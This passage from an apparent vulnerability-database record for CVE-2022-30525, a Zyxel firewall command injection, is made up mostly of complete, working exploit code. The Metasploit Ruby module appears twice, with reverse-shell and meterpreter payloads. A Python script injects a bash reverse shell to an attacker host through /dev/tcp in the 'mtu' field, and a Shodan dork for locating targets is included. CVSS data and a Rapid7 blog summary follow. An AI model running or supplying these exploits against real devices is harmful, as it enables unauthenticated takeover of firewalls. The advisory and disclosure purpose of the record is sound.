page, an attacker can gain remote command execution \nas the nobody user. \n \nAffected Zyxel models are: \n \n* USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below \n* USG20-VPN and USG20W-VPN using firmware 5.21 and below \n* ATP 100, 200, 500, 700, 800 using firmware 5.21 and below \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'jbaines-r7' # Vulnerability discovery and Metasploit module \n], \n'References' => [ \n[ 'CVE', '2022-30525' ], \n[ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/'] \n], \n'DisclosureDate' => '2022-04-28', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_MIPS64,], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Shell Dropper', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_MIPS64], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'curl', 'wget' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \n# Checks the build date that is embedded in the landing page. If it finds a build \n# date older than April 20, 2022 then it will additionally check if the model is \n# a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this \n# seems like a reasonable approach. \ndef check \nres = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/')) \nunless res \nreturn CheckCode::Unknown('The target failed to respond to check.') \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe('Failed to retrieve /') \nend \n \nver = res.body[/favicon\\.ico\\?v=(?<build_date>[0-9]{6,})/, :build_date] \nif ver.nil? \nreturn CheckCode::Safe('Could not extract a version number') \nend \n \nif ver[0..5].to_i < 220420 \nmodel = res.get_html_document.xpath('//title').text \nif model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN')) \nreturn CheckCode::Appears(\"This was determined by the model and build date: #{model}, #{ver}\") \nend \nend \n \nCheckCode::Safe(\"This determination is based on the build date string: #{ver}.\") \nend \n \ndef execute_command(cmd, _opts = {}) \nhandler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler') \nprint_status(\"Sending command to #{handler_uri}\") \n \n# this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too \n# but it's more involved. \nhttp_payload = { \n'command' => 'setWanPortSt', \n'proto' => 'dhcp', \n'port' => Rex::Text.rand_text_numeric(4).to_s, \n'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s, \n'vlanid' => Rex::Text.rand_text_numeric(4).to_s, \n'mtu' => \";#{cmd};\", \n'data' => '' \n} \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => handler_uri, \n'headers' => \n{ \n'Content-Type' => 'application/json; charset=utf-8' \n}, \n'data' => http_payload.to_json \n}) \n# Successful exploitation can result in no response (connection being held open by a reverse shell) \n# or, if the command executes immediately, a response with a 503. \nif res && res.code != 503 \nfail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\") \nend \nprint_good('Command successfully executed.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167182/zyxel_ztp_rce.rb.txt"}], "zdt": [{"lastseen": "2022-05-23T21:37:30", "description": "This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T00:00:00", "type": "zdt", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T00:00:00", "id": "1337DAY-ID-37733", "href": "https://0day.today/exploit/description/37733", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits CVE-2022-30525, an unauthenticated remote\n command injection vulnerability affecting Zyxel firewalls with zero\n touch provisioning (ZTP) support. By sending a malicious setWanPortSt\n command containing an mtu field with a crafted OS command to the\n /ztp/cgi-bin/handler page, an attacker can gain remote command execution\n as the nobody user.\n\n Affected Zyxel models are:\n\n * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below\n * USG20-VPN and USG20W-VPN using firmware 5.21 and below\n * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2022-30525' ],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']\n ],\n 'DisclosureDate' => '2022-04-28',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_MIPS64,],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Shell Dropper',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_MIPS64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'curl', 'wget' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Checks the build date that is embedded in the landing page. If it finds a build\n # date older than April 20, 2022 then it will additionally check if the model is\n # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this\n # seems like a reasonable approach.\n def check\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))\n unless res\n return CheckCode::Unknown('The target failed to respond to check.')\n end\n\n unless res.code == 200\n return CheckCode::Safe('Failed to retrieve /')\n end\n\n ver = res.body[/favicon\\.ico\\?v=(?<build_date>[0-9]{6,})/, :build_date]\n if ver.nil?\n return CheckCode::Safe('Could not extract a version number')\n end\n\n if ver[0..5].to_i < 220420\n model = res.get_html_document.xpath('//title').text\n if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))\n return CheckCode::Appears(\"This was determined by the model and build date: #{model}, #{ver}\")\n end\n end\n\n CheckCode::Safe(\"This determination is based on the build date string: #{ver}.\")\n end\n\n def execute_command(cmd, _opts = {})\n handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')\n print_status(\"Sending command to #{handler_uri}\")\n\n # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too\n # but it's more involved.\n http_payload = {\n 'command' => 'setWanPortSt',\n 'proto' => 'dhcp',\n 'port' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlanid' => Rex::Text.rand_text_numeric(4).to_s,\n 'mtu' => \";#{cmd};\",\n 'data' => ''\n }\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => handler_uri,\n 'headers' =>\n {\n 'Content-Type' => 'application/json; charset=utf-8'\n },\n 'data' => http_payload.to_json\n })\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 503.\n if res && res.code != 503\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n print_good('Command successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37733", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-03T08:16:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "zdt", "title": "Zyxel USG FLEX 5.21 - OS Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-03T00:00:00", "id": "1337DAY-ID-37766", "href": "https://0day.today/exploit/description/37766", "sourceData": "# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection\n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\"\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://www.zyxel.com\n# Version: ZLD5.00 thru ZLD5.21\n# Tested on: Linux\n# CVE: CVE-2022-30525\n\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nimport sys\nimport json\nimport base64\nimport requests\nimport argparse\n\n\nparser = argparse.ArgumentParser(\n prog=\"CVE-2022-30525.py\",\n description=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\",\n)\nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\")\nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\")\nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\")\n\nargs = parser.parse_args()\n\nbanner = (\n \"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\"\n \"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\"\n \"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\"\n \"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\"\n \"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\"\n \"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\"\n \"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\"\n \"biA6KSApCg==\"\n)\n\n\ndef main():\n\n print(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\"))\n\n if None in vars(args).values():\n print(f\"[!] Please enter all parameters !\")\n parser.print_help()\n sys.exit()\n\n if \"http\" not in args.url:\n args.url = \"https://\" + args.url\n args.url += \"/ztp/cgi-bin/handler\"\n exploit(args.url, args.host, args.port)\n\n\ndef exploit(url, host, port):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\",\n \"Content-Type\": \"application/json\",\n }\n\n data = {\n \"command\": \"setWanPortSt\",\n \"proto\": \"dhcp\",\n \"port\": \"4\",\n \"vlan_tagged\": \"1\",\n \"vlanid\": \"5\",\n \"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";',\n \"data\": \"hi\",\n }\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n print(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\")\n\n try:\n response = requests.post(\n url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5\n )\n except (KeyboardInterrupt, requests.exceptions.Timeout):\n print(\"[!] Bye Bye hekcer !\")\n sys.exit(1)\n finally:\n\n try:\n print(\"[!] Can't exploit the target ! Code :\", response.status_code)\n\n except:\n print(\"[!] Enjoy your shell !!!\")\n\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/37766", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:15", "description": "This module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are: * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below * USG20-VPN and USG20W-VPN using firmware 5.21 and below * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T08:43:59", "type": "metasploit", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-13T20:32:12", "id": "MSF:EXPLOIT-LINUX-HTTP-ZYXEL_ZTP_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zyxel_ztp_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits CVE-2022-30525, an unauthenticated remote\n command injection vulnerability affecting Zyxel firewalls with zero\n touch provisioning (ZTP) support. By sending a malicious setWanPortSt\n command containing an mtu field with a crafted OS command to the\n /ztp/cgi-bin/handler page, an attacker can gain remote command execution\n as the nobody user.\n\n Affected Zyxel models are:\n\n * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below\n * USG20-VPN and USG20W-VPN using firmware 5.21 and below\n * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2022-30525' ],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']\n ],\n 'DisclosureDate' => '2022-04-28',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_MIPS64,],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Shell Dropper',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_MIPS64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'curl', 'wget' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Checks the build date that is embedded in the landing page. If it finds a build\n # date older than April 20, 2022 then it will additionally check if the model is\n # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this\n # seems like a reasonable approach.\n def check\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))\n unless res\n return CheckCode::Unknown('The target failed to respond to check.')\n end\n\n unless res.code == 200\n return CheckCode::Safe('Failed to retrieve /')\n end\n\n ver = res.body[/favicon\\.ico\\?v=(?<build_date>[0-9]{6,})/, :build_date]\n if ver.nil?\n return CheckCode::Safe('Could not extract a version number')\n end\n\n if ver[0..5].to_i < 220420\n model = res.get_html_document.xpath('//title').text\n if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))\n return CheckCode::Appears(\"This was determined by the model and build date: #{model}, #{ver}\")\n end\n end\n\n CheckCode::Safe(\"This determination is based on the build date string: #{ver}.\")\n end\n\n def execute_command(cmd, _opts = {})\n handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')\n print_status(\"Sending command to #{handler_uri}\")\n\n # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too\n # but it's more involved.\n http_payload = {\n 'command' => 'setWanPortSt',\n 'proto' => 'dhcp',\n 'port' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlanid' => Rex::Text.rand_text_numeric(4).to_s,\n 'mtu' => \";#{cmd};\",\n 'data' => ''\n }\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => handler_uri,\n 'headers' =>\n {\n 'Content-Type' => 'application/json; charset=utf-8'\n },\n 'data' => http_payload.to_json\n })\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 503.\n if res && res.code != 503\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n print_good('Command successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zyxel_ztp_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-05-23T17:34:25", "description": "## Zyxel firewall unauthenticated command injection\n\n\n\nThis week, our very own [Jake Baines](<https://github.com/jbaines-r7>) added an exploit module that leverages [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>), an unauthenticated remote command injection vulnerability in Zyxel firewalls with zero touch provisioning (ZTP) support. Jake is also the author of the original research and [advisory](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) that was published last week. This module allows an attacker to achieve arbitrary code execution as the `nobody` user on affected devices. It takes advantage of an unsanitized user input that feeds the python `os.system` method behind the scenes. Well done Jake!\n\n## SAML credentials generator for vCenter Server\n\nCommunity contributor [npm-cesium137-io](<https://github.com/npm-cesium137-io>) added an auxiliary module that forges valid SAML credentials for vCenter server. These credentials are very useful since they can be used to gain access to the SSO domain as a vSphere administrator. Note that this module cannot run offline and must be executed while the target vCenter is reachable over the network to properly acquire the administrator session token. Also, the vCenter SSO Identity Provider (IdP) trusted certificate chain needs to be provided. This can be extracted manually from the `vmdir` database file at `/storage/db/vmware-vmdir/data.mdb` using [`binwalk`](<https://github.com/ReFirmLabs/binwalk>) or using this post [module](<https://github.com/rapid7/metasploit-framework/pull/16465>), which is still in review at the time of writing.\n\n## GSOC 2022\n\nThe Metasploit project was accepted again for the Google Summer of Code program. This year the team welcomes back [pingport80](<https://github.com/pingport80>) as a returning contributor and [3V3RYONE](<https://github.com/3V3RYONE>). These students will be working on Post API improvements and expanded HTTP-Trace support respectively. We look forward to mentoring and working with them in the coming months, so stay tuned for further updates as they get started!\n\n## New module content (3)\n\n * [VMware vCenter Forge SAML Authentication Credentials](<https://github.com/rapid7/metasploit-framework/pull/16484>) by npm - This module forges valid SAML credentials for vCenter server using the vCenter SSO IdP certificate, IdP private key, and VMCA root certificate as input objects.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>) \\- A new module has been added to exploit CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user.\n * [Bookmarked Sites Retriever](<https://github.com/rapid7/metasploit-framework/pull/16406>) by jerrelgordon - This adds a module to retrieve the bookmarks from Internet Explorer, Opera, Google Chrome, and Edge.\n\n## Enhancements and features (3)\n\n * [#16430](<https://github.com/rapid7/metasploit-framework/pull/16430>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds support for logging AS-REP Roastable accounts, as well as storing the generated Kerberos token within the creds database. Additionally improves error handling.\n * [#16442](<https://github.com/rapid7/metasploit-framework/pull/16442>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This adds a new `vars_form_data` field to the Rex HTTP Client for uploading files/form values to a remote HTTP server with ease:\n \n \n vars_form_data = [\n { 'name' => 'nsp', 'data' => @csrf_token },\n { 'name' => 'upload', 'data' => 1 },\n { 'name' => 'MAX_FILE_SIZE', 'data' => 1000000 },\n { 'name' => 'uploadedfile', 'data' => payload_zip, 'mime_type' => 'application/zip', 'encoding' => 'binary', 'filename' => zip_filename }\n ]\n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_form_data' => vars_form_data\n )\n \n\n * [#16555](<https://github.com/rapid7/metasploit-framework/pull/16555>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This moves a duplicated `retry_until_truthy` function into a centralized location for better reuse. This function is useful for retrying operations that may fail the first time, such as checking if Kubernetes containers are ready yet etc.\n\n## Bugs fixed (6)\n\n * [#16487](<https://github.com/rapid7/metasploit-framework/pull/16487>) from [red0xff](<https://github.com/red0xff>) \\- This fixes a deprecation warning in the `auxiliary/capture/server/mssql` warning as well as outputting a valid John The Ripper format for offline password cracking\n * [#16499](<https://github.com/rapid7/metasploit-framework/pull/16499>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue where SSL connections made by Metasploit would fail when the Server Name Indicator (SNI) extension was in use.\n * [#16505](<https://github.com/rapid7/metasploit-framework/pull/16505>) from [AdrianVollmer](<https://github.com/AdrianVollmer>) \\- This fixes an issue in the `auxiliary/scanner/lotus/lotus_domino_hashes` `#dump_hashes` parsing logic.\n * [#16570](<https://github.com/rapid7/metasploit-framework/pull/16570>) from [ssst0n3](<https://github.com/ssst0n3>) \\- This fixes a bug in the generation of aarch64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process.\n * [#16572](<https://github.com/rapid7/metasploit-framework/pull/16572>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed whereby a `PayloadSpaceViolation` exception might be raised when the `--smallest` flag was used with `msfvenom`, due to `msfvenom` setting the space available to 0 instead of a positive number. The code should now appropriately account for this case.\n * [#16588](<https://github.com/rapid7/metasploit-framework/pull/16588>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a check to the two new Powershell adapter payload modules. The size check intends to ensure that payloads that are too large (like unstaged Meterpreters) are marked as incompatible.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.42...6.1.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-12T07%3A30%3A04-05%3A00..2022-05-19T09%3A28%3A41-05%3A00%22>)\n * [Full diff 6.1.42...6.1.43](<https://github.com/rapid7/metasploit-framework/compare/6.1.42...6.1.43>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T19:14:42", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": 